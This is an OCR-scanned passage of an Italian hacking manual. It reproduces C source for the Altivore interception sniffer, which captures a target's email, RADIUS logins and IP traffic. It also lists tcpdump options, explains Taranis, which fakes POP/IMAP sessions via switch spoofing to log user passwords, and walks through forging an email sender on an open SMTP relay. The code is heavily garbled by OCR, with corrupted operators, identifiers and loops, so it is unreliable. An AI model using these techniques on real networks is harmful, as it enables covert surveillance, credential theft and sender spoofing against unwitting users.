if (rad->status < 1 II 8 < rad->status) 

rad->status = 2; /*STOP if unknown*/ 
break; 

case 44: /*Acct-Session—Id*/ 

setString (Srad—>session id, buf, data offset, len); 
break; 

case 46: /*Acct—Session—Time*/ 

/*Could be interesting Information to collect*/ 
if (len == 4) 

rad->session_duration = ex32 (buf, data_offset) ; 
break; 

} 

} 

/* The data was parsed from the RADIUS packet, now process that 

* data in order to trigger on the suspect . */ 
radProcess (carn, rad); 
radFree (rad) ; 
return 0; 
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int offset; 
int proto; 
int src; 
int dst; 

int data_offset; 
int max__offset; 

}; 

struct tcphdr { 
int offset; 
int src; 
int dst; 
int seqno; 
int ackno; 
int flags; 
int data_offset; 



/** 

* This packet is called for each packet received from the wire 

* (or from test input) . This function will parse the packet into 

* the consituent IP and TCP headers, then find tiiich stream the 

* packet belongs to, then parse the remaining data according 

* to that stream. 
*/ 

int 

sniff Packet (Carnivore *carn, const unsigned char buf[], 

int max_offset, time_t timestamp, int usecs) 

{ 

struct iphdr ip; 
struct tcphdr tcp; 
TcpCnxn cn; 

/* Make sure that we have a frame long enough to hold the 
* Ethernet (14) , IP (20) , and UDP (8) or TCP (20) headers */ 
if (max_offset < 14 + 20 + 20) 

return 1; /* packet fragment too small */ 

if (exl6 (buf , 12) != 0x0800) 

return 1; /*not IP ethertype */ 

/*IP*/ 

ip. offset = 14; /*sizeof ethernet header*/ 
if (IP_VERSION(buf, ip. offset) != 4) 
return 1; 

ip. proto = IP_PROTOCOL (buf, ip. offset) ; 
ip . src = IP_SRC (buf, ip . offset ) ; 
ip.dst = IP_DST (buf, ip. offset); 

ip . datalo ff set = ip. offset + IP_SIZEOF_HDR(buf,ip.offset); 
if (max_offset > IP_TOTALLENGTH (buf, ip . offset ) + ip. offset) 

ip.max_offset = IP_ TOTALLENGTH (buf, ip . offset ) + ip. offset; 

else 

ip.max__offset = max offset; 

/* If sniff ing somebody's IP address, then sift for it */ 
if (MODE (carn, mode_ip_content) 

&& has_integer (&carn->ip, ip.src, ip.dst)) 
carn->do_filter = TRUE; 

if (ip. proto == 6) { 
/*TCP*/ 

tcp. offset = ip . data_offset ; 
tcp. dst = TCP_DST (buf, tcp. offset) ; 
tcp . src = TCP_SRC (buf, tcp . offset ) ; 
tcp. flags = TCP_FLAGS (buf, tcp. offset) ; 
tcp. seqno = TCP_SEQNO(buf,tcp.offset); 
tcp . ackno = TCP_ACKNO (buf, tcp . offset ) ; 
tcp. datalo ff set = tcp. offset 

+ TCP_SIZEOF_HDR (buf, tcp . offset ) ; 

if (MODE (carn, mode__server__access) ) { 

/* We are watching for when the user attempts to access 

* servers of a speci fic type (HTTP, FTP, etc). This 

* only tracks SYNs; though we could change the code 

* to track ali packet s . */ 
if ((tcp. flags & TCP_SYN) 
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&& has_integer (Scarn->ip, tcp.dst, tcp.dst) ) { 
char tbuf [64] ; 

formatNow (tbuf, sizeof (tbuf) ) ; 

logprint (carn, "%s, %d.%d.%d. %d, %d.%d. %d. %d, %d\n ", 
tbuf, P_IP_ADDR(lp.src) , P_IP_ADDR ( ip . dst ) , 
tcp. dst) ; 

} 

) 

else 

switch (tcp.dst) { 
case 25: 

cn.server_ip = ip.dst; 

cn.client_±p = ip.src; 

cn . server_port = tcp.dst; 

cn. client _port = tcp.src; 

cn . server__seqno = tcp.ackno; 

cn . client_seqno = tcp.seqno; 

sniffSmtp (carn, &cn, tcp.flags / TCP_ TO_SERVER, 

buf, tcp.data_offset, ip.max_offset) ; 

break; 

} 

) else if (ip. proto ==17) { 
/*UDP*/ 

tcp. offset = ip . data__offset ; 

tcp . dst = TCP_DST (buf, tcp . offset) ; 

tcp . src = TCP_SRC (buf, tcp . offset) ; 

tcp . data_offset = tcp. off set + 8; 

if (tcp.dst == 1812 II tcp.dst == 1813 

Il tcp.dst == 1645 II tcp.dst == 1646 

Il tcp.src == 1812 II tcp.src == 1813 

Il tcp.src == 1645 II tcp.src == 1646) { 

/* This looks like a RADIUS packet, either using the 

* old port number or the new one. fife are going to 

* track both RADIUS authentication packets as well 

* as accounting packets (depending upon whwere we 

* are tapped into the network, we might see one, 

* the other, or both) . */ 
sniffRadius (carn, ip.src, ip.dst, 

buf, tcp.data_offset, ip.max_offset) ; 

} 

} 

/* If one of the filters was successful, then save this packet 

* to the tracefile. This is only done*/ 
if (carn—>do_filter) 

carnSavePacket (carn, buf, max_offset, timestamp, usecs) ; 

return 0; 



* A callback function that handles each packet as the ' libpcap' 

* subsystem receives it from the network. 
*/ 

void pcapHandlePacket (unsigned char *carn, 

const struct pcap_pkthdr *framehdr, const unsigned char *buf) 

{ 

int max off set = framehdr—>caplen; 
snif f Packet ( (Carnivore*) carn, buf, max offset, 
framehdr—>ts . tv_sec, framehdr—>ts . tv_usec) ; 

} 



/** 

* Sets the mode of operation according to the input parameter . 
*/ 
void 

carnSetMode (Carnivore *carn, const char *value) 



if ( start sWith (value, "email-head" ) ) 
carn—>mode = mode email headers ; 
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carn->mode = mode email headers; 
else if (startsWith (value, "server-access") ) 

carn->mode = mode_server_access ; 
else if (startsWith (value, "email-content") ) 

carn—>mode = mode email content; 
else if (startsWith (value, "ip-content") ) 

carn—>mode = modeipcontent ; 

else 

carn—>mode = —1; 

} 

/** 

* Parses the IP address. I use this rather than the sockets 

* inet_addr () for portability reasons . 
*/ 

int 

my_inet_addr (const char addr[]) 
{ 

int num - 0; 
int offset=0; 

while (addr[offset] && !isalnum(addr[offset])) 
off Set++; 

for (; addr [offset] ; off Set++) { 
char c = addr [off set] ; 
if (isdigit (c) ) 

num = (num&OxFFFFFFOO) / ( ( (num&OxFF) *10) + (c - '0')); 
else if (c == ' . ') 

num «= 8; 

else 

break; 

} 

return num; 

) 

* Reads in the configuration from a a file such as "altivore . ini" . 

*/ 

void 

carnReadConfiguration (Carnivore *carn, const char filename[]) 
{ 

FILE *fp; 

fp = fopen (filename, "r") ; 
if (fp == NULL) 

perror (filename) ; 
else { 

char line [1024] ; 

/* For ali lines within the file */ 
while (fgets(line, sizeof (line) , fp) ) ( 

char *name = line; 

char *value; 

while (*name && i s space (*name) ) 

name++; /*strip leading whitespace*/ 

if (*name == '\0' Il ispunct (*name) ) 

continue; /*ignore blank lines and comments*/ 

value = strchr(name, '='); 

if (value == NULL) 

continue; /*ignore when no equals sign*/ 

else 

value++; /*skip the equals itself*/ 
while (*value && isspace (*value) ) 

value++; /*strip leading whitespace*/ 
while (*value && isspace (value[strlen (value) -1] ) ) 

value [strlen(value)-l] = '\0'; /*strip trailing WS*/ 

if (startsWith (name, "mode")) 

carn—>mode = parseMode (value) ; 
else if (startsWith (name, "email . address ") ) 

straAddElement (&carn—>email_addresses, value) ; 
else if (startsWith (name, "radius . account ") ) 

straAddElement (&carn->radius_accounts, value) ; 
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add_integer (&carn->ip, my_inet_addr (value) ) ; 
else if (startsWith (name, "tracefile" ) ) 

setString (&carn->tracefile, value, 0, -1) ; 
else if (startsWith (name, "logfile") ) 

setString (&carn->logf ile, value, 0, -1); 
else if (startsWith (name, "testinput") ) 

straAddElement (Scarn->testinput, value) ; 
else if (startsWith (name, "interface") ) 

straAddElement (Scarn->interfaces, value) ; 
else if (startsWith (name, "server .port") ) 

add_integer (Scarn->ip, strtol (value, 0, 0) ) ; 

else 

fprintf (stderr, "bad param: %s\n", line); 

> 

foiose (fp) ; 

} 

} 



/** 

* Process a test input file. 
*/ 
void 

processFile (Carnivore *carn, const char filename [] ) 
{ 

char errbuf [1024] ; /*TODO: how long should this be?*/ 
pcap_t *hPcap; 

/* Open the file */ 

hPcap = pcap open off line (filename, errbuf) ; 
if (hPcap == NULL) { 

fprintf (stderr, "%s: %s\n", filename, errbuf); 

return; /*ignore this file and go onto next*/ 

} 

/* Pump packets through it */ 

for (;;) ( 

int packets_read = pcap_dispatch ( 

hPcap, /*handle to PCAP*/ 
10, /*next 10 packets*/ 

pcapHandlePacket, /*callback*/ 
(unsigned char*)carn /*canivore*/ 

); 

if (packets_read == 0) 
break; 

} 

/* Close the file and go onto the next one */ 
pcap_close (hPcap) ; 

} 



/** 

* Sniff the wire for packets and process them using the libpcap 

* interface 
*/ 

void 

processPackets (Carnivore *carn, const char devicename [ ] ) 
{ 

int traffic_seen = FALSE; 

int total packets processed = 0; 

pcap_t *hPcap; 

char errbuf [1024] ; 

hPcap = pcap_open_live ( (char*) devicename, 

2000, /*snap len*/ 
1, /*promiscuous*/ 
10, /*10-ms read timeout*/ 

errbuf 

); 

if (hPcap == NULL) ( 

fprintf (stderr, "%s: %s\n", devicename, errbuf); 
return; 

} 

/* Pump packets through it */ 
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int packets_read; 

packets_read = pcap_di spatch ( 

hPcap, /*handle to PCAP*/ 
10, /*next 10 packets*/ 

pcapHandlePacket, /*callback*/ 
(unsigned char*) carn /*canivore*/ 

); 

total _packets_processed += packets_read; 

if (!trafflc_seen && total_packets _j>rocessed > 0) { 

fprintf (stderr, "Traffic seen\n") ; 

traffic__seen = TRUE; 

} 

} 

/* Close the file and go onto the next one */ 
pcap_close (hPcap) ; 

} 

/* */ 

int 

mainfint argc, char *argv[]) 
{ 

int i; 

Carnivore *carn; 

printf(" ALTIVORE \n") ; 

pr int f ("Copyright (c) 2000 by Network ICE Corporation\n" ) ; 
pr int f ( "Public disclosure of the source code does not\n") ; 
printf ( "constitute a license to use this software .\n") ; 
printf("Use \"altivore -?\" for help.\n") ; 

/* Create the carnivore subsystem */ 

cara = (Carnivore* ') malloc (sizeof (Carnivore) ) ; 

memset (carn , 0, sizeof (*carn) ) ; 



/* Read configuration info from "altivore.ini". */ 
carnReadConfiguration (carn, "altivore . ini ") ; 

/* Parse ali the options from the command—line . Normally, 

* you wouldn't have any command—line options, you would 

* simply use the configuration file above. */ 
for (i=l; iemail_addresses, argv[i]); 

else switch (argv[i] [1] ) { 
case 'h ' : 

add_integer (&carn->ip, my_inet_addr (argv[ i ] +2) ) ; 
break; 
case ' i ' : 

straAddElement (Scarn->interfaces, argv[i]+2) ; 
break; 
case '1 ' : 

setString (&carn->logfile, argv[i]+2, 0, -1) ; 

break; 
case 'm ' : 

carn->mode = parseMode (argv[i] +2) ; 

break; 
case 'p ' : 

add_integer (&carn->port , strtol (argv[i ] +2, 0,0)); 
break; 
case ' r ' : 

straAddElement (Scarn->testinput, argv[i]+2) ; 
break; 
case ' w ' : 

setString (&carn->tracef ile, argv[i]+2, 0, -1) ; 

break; 
case ' ? ' : 

printf ( "Options : \n " 

" address to filter for, e.g. :\n" 
" rob@altivore.com (exact match)\n" 
" *@altivore . com (partial match)\n" 
" * (match ali emails)\n" 

); 

printf ( "—h \n " 

"\tIP of host to sniff\n") ; 
printf ( "—i \n " 
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printf("-l\n" 

"\tText-output logging\n") ; 
printf ("-m\n" 

"\tMode to run in, see docs\n") ; 
printf ("-p\n" 

"\tServer port to filter on\n") ; 
printf ("-r\n" 

"\tTest input\n"); 
printf ("-w\n" 

"\tEvidence tracefile to write packets to\n") ; 
return 1; 
default : 

fprintf (stderr , "Unknown pariti: %s\n", argv[i] ) ; 
break; 

} 

} 

/* Print the configuration for debugging purposes */ 
printf ( "\tmode = %s\n", modeNames [ carn->mode ] ) ; 
if (carn->tracefile) 

printf ("\ttrace file = %s\n", carn->tracefile) ; 
if (carn->logfile) 

printf ("\tlogf ile = %s\n", carn->logfile) ; 
for (i=0; iip.count; i++) 

printf ("\tip = %d. %d. %d. %d\n", P_IP_ADDR (carn->ip . list [i] ) ) ; 
for (i=0; iport . count ; i++) 

printf ("\tport = %d\n", carn->port . list) ; 
for (i=0; iemail^addresses . length; i++) 

printf ("\temail . address = %s\n" / carn->email_addresses . str [i] ) ; 
for (i=0; iradius_accounts . length; i++) 

printf ("\tradius . accounts = %s\n" / carn->radius_accounts . str [i] ) ; 
for (i=0; itestinput . length; i++) 

printf ("\ttestinput = %s\n", carn->test input . str [i] ) ; 
for (i=0; iinterfaces .length; i++) 

printf ("\tinter face = %s\n", carn->interfaces.str[i]); 

/* Testing only: user can specify tracefiles containing network 

* traffic for test purposes. */ 
if (carn->testinput . length > 0) { 
int i; 

for (i=0; itestinput . length; i++) 

processFile (carn, carn->test input . str[i]) ; 
return 0; 

} 

/* Open adapters and rea*/ 

if (carn->interf aces . length > 0) { 

/*TODO: allow multiple adapters to be opened*/ 

char *devicename = carn— >interf aces . str [0] ; 

processPackets (carn, devicename) ; 
} else { 

char *devicename; 

char errbuf [1024] ; 

devicename = pcap lookupdev (errbuf ) ; 
if (devicename == NULL) 

fprintf (stderr , "%s\ii", errbuf) ; 

else 

processPackets (carn, devicename) ; 

} 

return 0; 

} 

Il file appena visto può essere compilato sia in ambiente Linux che in ambiente Windows 
grazie al porting della libreria TCPDUMP fatta da un Università italiana. 
Il programma CARNIVORE ha suscitato moltissime polemiche in quanto rappresenta il 
massimo nell'ambito della violazione della privacy. 

Mentre gli altri tipi di sniffer sono orientati all'intercettazione dei dati che viaggiano su certi 
segmenti di rete in modalità RAW, ovvero senza distinzione sulla loro tipologia , qui quello 
che viene sniffato sono delle entità che costituiscono il principale metodo di comunicazione. 
In ambiente linux la compilazione avviene con : 

gcc altivore.c -lpcap -Ipcap -o altivore 
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TCPDUMP 

La libreria Windump può essere prelevata dal sito 
http://netgroup-serv.polito.it/winpcap/ 
mentre il sito di TCPDUMP è 
http://www. tcpdump.org/ 

La compilazione in ambiente Windows deve includere a livello di link I files di libreria 
"libpcap.lib", "user32.lib" e "wsock32.lib" le quali si trovano nelle directory create 
dall'installazione del pacchetto. 

TCPDUMP in ambiente Linux può essere anche utilizzato in modo interattivo per eseguire lo 
sniffing dei segmenti di rete. 

Questo esegue il capture dei pacchetti che viaggiano su una certa interfaccia di rete di un 
sistema. 

La sintassi per poterlo usare è la seguente : 

TCPDUMP [ -adeflnNOpqStv ][ -c count ][ -F file ] [ -i interface ][ -r file ][ -s snaplen ] 
[ -T type ][ -w file ][ expression ] 

WINDUMP possiede due speciali opzioni e precisamente : 

[-D][-Bsize] 

In alcuni casi la sintassi viene riportata come segue 

tcpdump [ -d ] [ -e][ -f][ -l][ -n][ -N ] [ -O ] [ -p ] [ -q ] [ -S ] [ -t ] [ -v ] [ -x][ - 

c Count] [ -F File ] [ -i Interface ] [ -r File ] [ -s Snaplen ] [ -w File ] [ Expression ] 

La visualizzazione dei dati relativi ai pacchetti viene fatto da TCPDUMP mediante la stampa 
degli header che viaggiano su una determinata interfaccia di rete del sistema in analisi. 
Le opzioni di TCPDUMP hanno i seguenti significati : 



-a Cerca di convertire gli indirizzi di rete e di broadcast in nomi 

-c Esce dopo aver ricevuto il numero count di pacchetti 

-d Esegue il dump dei pacchetti individuati in una forma comprensibile 

-dd Esegue il dump come frammenti di codice C 

-ddd Esegue il dump come numeri decimali 

-e Stampa l'header relativo al livello di link per ogni line per cui si è eseguito il 

dump 

-f Stampa gli indirizzi come numeri invece che come simboli 

-F Utilizza un file come input legato alle espressioni da usare come filtri. 

-i Utilizza l'interfaccia per il listing 

-I Bufferiza le linee di stdout. 

-n Non converte gli indirizzi in numeri 

-N Non stampa i nomi qualificati di dominio abbinati alThost. In altre parole con 

questo flag vedrete www invece di www.nic.it 
-O Non esegue l'ottimizzatore per la ricerca del codice dentro ai pacchetti, 

-p Non mette l'interfaccia in modo promiscuo 

-q Quick output 

-r Legge I pacchetti da file 

-s Tronca di snaplen bytes i pacchetti di dati invece di usare il valore di 68. 

-T Forza i pacchetti selezionati dall'espressione ad essere interpretati secondo un 

determinato tipo il quale può essere RPC (Remote Procedura Cali), rtp (Real 
Time Applications protocol), rtpc (Real Time Applications Control Protocol), vat 
(Visual Audio Tool) e wb (White board) 

-S Stampa il numero di sequenza TCP assoluto invece di quello relativo. 

-t Non stampa il tempo ogni linea 
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-tt 


Stampa in modo non formattato il tempo 


-V 


Modo verboso 


-vv 


Un output più verboso 


-w 


Scrive i pacchetti in modo raw 


-X 


Stampa ogni pacchetto in modo esadecimale 



Quelle che seguono sono le primitive utilizzabili permesse. 



dst host Host 


Vero se il valore di IP del campo di destinazione è lo stesso della 
variabile Host. 


src host Host 


Verpo se il valore di IP del campo sorgente è lo stesso della 
variabile Host. 


host Host 


Vero se il valore di uno degli IP di sorgente o destinazione del 
pacchetto è uguale a quello della variabile Host. 
Qualsiasi delle seguenti espressioni host possono essere 
preapposte dalle parole ip, arp, or rarp : 

ip host Host 

Se la variabile Host è il nome di un IP multiplo ogni indirizzo viene 
testato. 


dst net Net 


Vero se l' IP dell'indirizzo di destinazione del pacchetto ha un 


src net Net 


Vero se il valore di IP della sorgente ha un numero di Net uguale a 
quello della variabile Net. 


net Net 


Vero se il valore dell' IP di sorgente o di destinazione ha il valore di 


dst port Port 


Vero se il pacchetto è TCP/IP (Transmission Control 
Protocol/Internet Protocol) o IP/UDP (Internet Protocol/User 
Datagram Protocol) e possiede come porta di destinazione il 
valore specificato nella variabile Port. 
Loa porta può essere un numero o un nome specificato in 
/etc/services. Se viene usato un nome sia le porte che il protocollo 
sono testati. Se invece viene usato un numero oppure un nome 
ambinuo solo il numero di norta viene testato 


src port Port 


Vero se il valore della porta è lo stesso di quello della variabile 
Port. 


port Port 


Vero se il valore della porta sorgente o destinazione è lo stesso di 
queiio specincaipo ueniro ana variauiie ron.. qualsiasi espressione 
port può essere anteposto con 1 termini tcp or udp: 

tcp src port port 

che permette di identificare solo 1 pacchetti TCP. 


less Length 


Vero se il pacchetto ha una lunghezza minore o uguale a Length. 
len < = Length. 


greater Length 


Vero se il pacchetto ha una lunghezza maggiore o uguale alla 
variabile Length. 

len > = Length 


ip proto Protocol 


Vero se il pacchetto è di protocollo di tipo Protocol il cui nome può 
essere icmp, udp, o tcp. 







Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



ip multicast 


Vero se il pacchetto è di tipo IP multicast. 


proto Protocol 


Vero se il pacchetto è di un protocollo di tipo Protocol il quale può 
essere ip, arp, o rarp. 


ip, arp, rarp 


Abreviazione per: 
proto p 

dove n iè uno dei citati nrotocolli 


tcp, udp, icmp 


Abreviazione per : 
ip proto p 



Le primitive possono essere messe insieme tramite gli operatori and, or, e not . 
Il formato generico del protocollo TCP è il seguente : 

src > dst: flags data-seqno ack win urg optlons 

I seguenti sono esempi di utilizzo : 



1 . Per stampare tutti I pacchetti che partono da devo: 



tcpdump host devo 


2. 


Per stampare tutto il traffico tra gii e devo o bevo: 


tcpdump ip host gii and \(devo bevo\) 


3. 


Per stampare tutti I pacchetti IP tra bevo e qualsiasi host tranne gii: 


4. 


Per stampare tutto il traffico tra locai hosts e gli hosts o la rete 192.100.192: 


5. 


Per stampare il traffico escluso il sorgente e non destinato al locai hosts: 


tcpdump ip and not net localnet 


6. 


Per stampare il pacchetto di partenza e di fine di ogni comunicazione TCP che non 




coinvolge il locai host: 


7. 


Per stampare tutti I pacchetti ICMP che non sono richieste di echo o repliche: 




8. 


Per stampare immediatamente le informazioni dei pacchetti: 
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9. Per specificare un interfaccia token-ring: 

tcpdump -i trO 

10. Per stampare le informazioni dei pacchetti in un file Tracelnfo: 



COMMVI EW 

Uno dei pacchetti più comodi in ambiente Windows per eseguire lo sniffing è sicuramente 
CommView il quale dispone di moltissime particolarità che permettono di settare sia le 
caratteristiche di visualizzazione che quelle di filtraggio. 

CommView permette inoltre di gestire automaticamente del file di LOG i quali possono essere 
utili per monitorare le caratteristiche delle trasmissioni su un determinato segmento di rete. 
Ripeto questo concetto del segmento in quanto deve essere chiaro che da un sistema è 
possibile solo vedere i pacchetti che passano sulle interfacce di questo in quanto in effetti lo 
sniffer altro non fa se non visualizzare i dati dentro agli header dei pacchetti stessi. 
Chiaramente dopo aver intercettato il pacchetto il fatto di filtrarlo o loggarlo è semplicemente 
frutto di una serie di funzioni aggiuntive del pacchetto stesso. 

Come abbiamo visto precedentemente sotto Unix TCPDUMP costituisce l'esempio di un 
ottimo sniffer il quale interfacciandosi ai driver di rete visualizza i dati dei pacchetti. 
Generalmente i pacchetti come CommView installano all'interno del sistema dei driver 
aggiuntivi i quali unendosi con quelli esistenti permettono al pacchetto di intercettare i dati che 
transitano su una certa interfaccia. 
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Il formato di visualizzazione dei pacchetti avviene in una finestra come elenco di delle 
connessioni attive. 

In ciascuna linea vengono visualizzati IP Locale, IP Remoto, pacchetti in IN, OUT, porte 
interessate, nome degli hosts e bytes trasferiti. 

L'immagine precedente visualizza la prima maschera di CommView quella in cui vengono 
visualizzati i dati come abbiamo appena detto. 

Il software memorizza le catene di pacchetti legati a ciascuna connessione e quindi è in grado 
di visualizzare ciascuno di questi. 



Taransi 

Taranis redirge il traffico di un switch hardware inviandogli del traffico ethernet falsificato. 
Questo non è la stessa cosa dell'attacco ARP avvelenato in quanto possiede solo il suo 
effetto su degli switch e non funziona sui pacchetti ARP. 
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In più questo è virtualmente invisibile dato che i pacchetti spediti non possono essere visti su 
nessuna altra porta dello switch. 

Prima di vedere il funzionamento dobbiamo fare un piccolo accenno storico. 

Quando tempo fa si vedevano delle schede ethernet siglate 10base5 queste venivano 

interpretate nel seguente modo. 

Il 10 davanti indicava la velocità mentre il 5 stava a specificare che la massima lunghezza del 
cavo poteva essere 500 metri. 

Veniva utilizzato un cavo coassiale che somigliava di più ad un cavo della televisione. 
Il cavo coassiale è costituito da un conduttore centrale circondato da uno strato di isolante. 
Una volta rete ethernet possedeva un pannello princiale condiviso ed una serie di cavi 
pluggati dentro a questo. 

Se la parte condivisa veniva alterata o rotta, l'intera rete cadeva. 

Da allora il cavo venne suddiviso in pezzi più brevi lungo il quale vennero inseriti dei ripetitori i 
quali aumentavano la potenza del segnale. 



Una rete 1 0base5 somigliava a: 







Pannello 


condiviso 








X-+ 








+-X 


(+ 


- Tranciever) 


/ 


1 


1 


1 1 


1 


(X 


- Terminator) 


/ 


1 


1 


1 1 


1 






Host 


Host 


Host 


Host Host 


Host 







Questo venne sostituito da thin Ethernet (10base2), la quale era basata su un cavo condiviso 
ma che non richiedeva amplificatori. 

Anche in questo caso comunque si era passibili di attacchi da parte dei roditori i quali 

colpivano di frequente i cavi. 

La rete 10base2 era simile a quella che segue : 



x . . . . . x 

Host Host Host Host Host 
A B C D E 

(X - terminator which is just a 50 ohm resistor) 
(. - BNC Connector, T shaped piece of metal that 

connected two pieces of cable with a computer) 



A questo punto fece la sua comparsa la 10baseT, o Twisted Pair Ethernet. 
Questa era costituita su una configurazione a stella. 

Il motivo del nome è facilmente comprensibile dall'osservazione dello schema. 



Host 


A Host B 


Host C 


1 


1 


1 


\ 


1 


/ 




\ 1 / 






Switch or Hub 






/ 1 \ 




/- 


/ 





Una header relativo ad un frame Ethernet è visto nel seguente modo: 



/ / / 


1 1 1 1 1 1 


1 


1 


1 


1 


1 


1 


0 


6 








11 




13 


Bytes 0-5 


are the Destination Address 














Bytes 6-11 


are the Source Address 
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Tutti I tipi appena visti (10base5, 10base2 and 10baseT) di sistemi ethernet sono basati su 
una condivisione media. 

Questo significa che ogni pacchetto è trasmesso ad ogni machina connessa. 

Questo significa anche che quando un device sta eseguendo un invio, nessun altro device 

può farlo. 

Per incrementare la banda sono stati inventati gli switch. 

Gli switch Ethernet switches inviano ad una porta solo i pacchetti che sono destinati a quella. 
Gli switch e gli hub sono costruiti per permettere quello definito con il termine di uplinking 
(quando connettete un altro switch ad una porta invece di collegarci un singolo computer). 
Nel caso di un hub, questo significherebbe che più macchine condividono la banda 
disponibile. 

Nel caso di uno switch invece significherebbe che il traffico interno da un hub su una porta 
non verrebbe visto su un'altra porta. 

Questo significherebbe anche che indirizzi multipli potrebbero essere connessi su ogni porta 
e che lo switch potrebbe contenenere una lista di tutti gli indirizzi ethernet che sono sulle 
porte fisiche e allo stesso modo inviare il traffico solo alla porta di destinazione sulla quale un 
cero host è connessa. 

Sarebbe stupido richiedere un amministratore per tracciare gli indirizzi ethernet per ciascuna 

macchina connessa in modo da farglieli inserire manualmente per creare questa lista. 

Lo switch genere a questa lista automaticamente leggendo il traffico che viaggia sullo switch 

stesso. 

Se lo switch esegue questa funzione allora teoricamente potrebbe essere vulnerabile ad un 
tipo di attacco. 

Quando eseguito, Taranis parte inviando pacchetti con l'indirizzo ethernet del mail server 
come sorgente e l'indirizzo della macchina di destinazione attaccata. 

Quando lo switch vede questi pacchetti esegue un update della tabella interna relativa alla 
mappa degli indirizzi. 

Lo switch non esegue il forward di pacchetti verso nessuna delle altre porte e l'indirizzo di 
destinazione viene settato come indirizzo associato alla porta corrente. 
La tabella interna assomiglia a: 



Port 




1 


Ethernet Addresses 












Port 


1 


■+- 

1 


01 : 00 :af : 34: 53: 62 










(Single host) 


Port 


2 


1 


01:e4:5f:2a:63:35 00. 


■ci. 


■24:ee. 


■62: 


■66 . . 


(Hub/ Switch) 


Port 


3 


1 


ll:af:5a:69:08:63 00. 


17: 


■72:el: 


■72: 


■70 . . 


(Hub/ Switch) 


Port 


4 


1 


00:14:62:74:23:5a 










(Single host) 



Ora che stiamo vedendo il traffico destinato ad un mailserver che cosa possiamo farci con 
questo ? 

L'idea iniziale era quella di eseguire una specie d'attacco ma di fatto questo è più difficile di 
quanto si pensi. 

Al contrario taranis falsifica sufficientemente una sessione pop o imap per prendere un client 
da autenticare inviando il suo nome utente e la password. 

Taranis salva le informazioni di autenticazione in un file di log. 
Per vedere il tutto in un formato comprensibile lanciate : 

cat taranis.log | sort | uniq 



Fake mail 

Falsificare I mittente di un email ? 
Nulla di più semplice. 

Lasciamo perdere le centinaia di programmi che svolgono queste funzioni e vediamo com'è 
possibile inviare manualmente un mail con mittente non esistente. 

Chiaramente il tutto deve essere dipendente dal fatto di trovare un mailserver che non 
disponga de determinate restrizioni sul relaying dei messaggi. 
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Un mailserver potrebbe avere settati un certo numero di restrizioni finalizzate al fatto di 
proteggere dall'invio senza autorizzazione di messaggi non autorizzati. 
Il software di gestione di questo tipo di server potrebbe gestire numerosi domini in particolar 
modo quando questo è in funzione su sistemi orientati all'hosting. 

Portando come esempio i nostri servers, qui in WEBSITEK.COM, abbiamo funzionanti su 
questi sistemi circa 400 domini relativi a clienti che posseggono i loro siti in hosting presso di 
noi. 

Ciascun dominio possiede la registrazione su mail servers differenti, il primo relativo a quello 
primario mentre ilo secondo a quello di backup. 

Il software che gestisce il mailserver possiede questi settaggi che regolano l'invio dei 
messaggi : 

• Il dominio di chi invia deve essere locale al sistema 

Il dominio di chi invia deve possedere nel record di gestione del DNS un record MX 



In ogni caso sparsi sulla rete esistono un gran numero di sistemi che non dispongono di 
restrizioni, per cui con uno scanner è possibile individuare un host che possegga il servizio 
SMTP attivo e quindi di poter provare a inviare una email con il seguente metodo. 
Sempre con TELNET o con NETCAT attiviamo un connessione sul sistema remoto 
richiedendo di utilizzare la porta 25 relativa a SMTP. 

C:\> telnet mail.dominio.it 25 
Trying 129.24.96.10... 
Connected to mail.dominio.it 
Escape character is ,A ]'. 
220 mail.dominio.it Smail-3.2 



Una volta connesso è possibile richiedere, digitando ? o man, la lista di comandi accettati dal 
mailserver. 

La risposta potrebbe essere : 



250- 
250- 
250- 
250- 
250- 
250- 
250- 
250- 
250- 
250- 
250- 
250- 
250- 
250- 
250- 
250- 
250- 
250- 
250- 



The followlng SMTP commands are recognized: 



HELO hostname 
EHLO hostname 

MAIL FROM: <sender-address> 

RCPT TO: <reclplent—address> 

VRFY <address> 

EXPN <address> 

DATA 

RSET 

NOOP 

DEBUG [level] 

HELP 

QUIT 



- startup and glve your hostname 

- startup with extension info 

- start transaction from sender 

- name recipient for message 

- verify deliverability of address 

- expand mailing list address 

- start text of mail message 

- reset state, drop transaction 

- do nothing 

- set debugging level, default 1 

- produce this help message 

- dose SMTP connection 



■The normal sequence of events in sending a message is to state the 
■sender address with a MAIL FROM command, give the recipients with 
■as many RCPT TO commands as are required (one address per command) 
■and then to speci fy the mail message text after the DATA command. 



A questo punto dovremo digitare linea dopo linea, attendendo la risposta dopo ciascuna di 
queste, tutte la parti relativa al messaggio che intendiamo spedire. 
Per prima cosa dovremo comunicare il nostro host con : 

helo websitek.com 



il sistema risponderà 
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A questo punto iniziamo scrivere il resto : 
mail from: flavio@websitek.com 
la risposta 



ora digitiamo chi è il destinatario 
rcpt to: flavio@bernardotti.al.it 
il tutto segue con la risposta 



Avvisiamo che intendiamo inserire I dati, 
data 



Veniamo avvisati ce è possibile scrivere terminando il messaggio con un unto 



354 Enter mail, end with "." on a line by itself 
To: flavio@bernardotti.al.it 
From: flavio@websitek.com (Flavio Bernardotti) 
Subject: Prova mesagio. 

Questa è solo una prova. 



Dopo il punto il sistema ci avvisa : 
250 Mail accepted. 



Con quit terminiamo 



La mail verrà inviata come se di fatto fosse vera. 
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CommView dispone di una funzione particolare che permette di ricostruire tutta la sequenza 
dei pacchetti TCP legati ad un certo collegamento. 

Questa metodologia è particolarmente interessante quando si vuole studiare il 
comportamento di un determinato sistema che comunica con un server tramite internet. 
Supponiamo che un certo software dopo aver inserito dei dati di registrazione si connetta con 
un server per avere un certa risposta. 

Tramite CommView possiamo ricostruire tutta la connessione. 

Ad esempio quella che segue è la ricostruzione di un colloquio TCP. 
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Tra le potenzialità di CommView c'e' anche quella legata al generatore di pacchetti. 
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Dicevamo prima che una delle potenzialità di CommView sta nel fatto che è possibile settare 
dei filtri per quanto riguarda i pacchetti che devono essere visualizzati. 
Un sofisticato sistema di gestione filtri permette di selezionare il protocollo e gli IP che devono 
essere gestiti 

, J fis Stirh Ymt Te* SSJteios filisi 



[> □ 
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□ip 




□ ADR 




□SI** 
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□ rcw 

□<]GP 

□ iPDWQflP 
□sr 

□ tcp 

□hm? 




Volendo installare un sistema visivo per l'identificazione degli usi strani dei protocolli 
potremmo usare questi filtri per ignorare i pacchetti relativi a protocolli di cui non ci interessa 
particolarmente. 

Le attività che possono essere svolte con uno sniffer come COMVIEW sono diverse e 
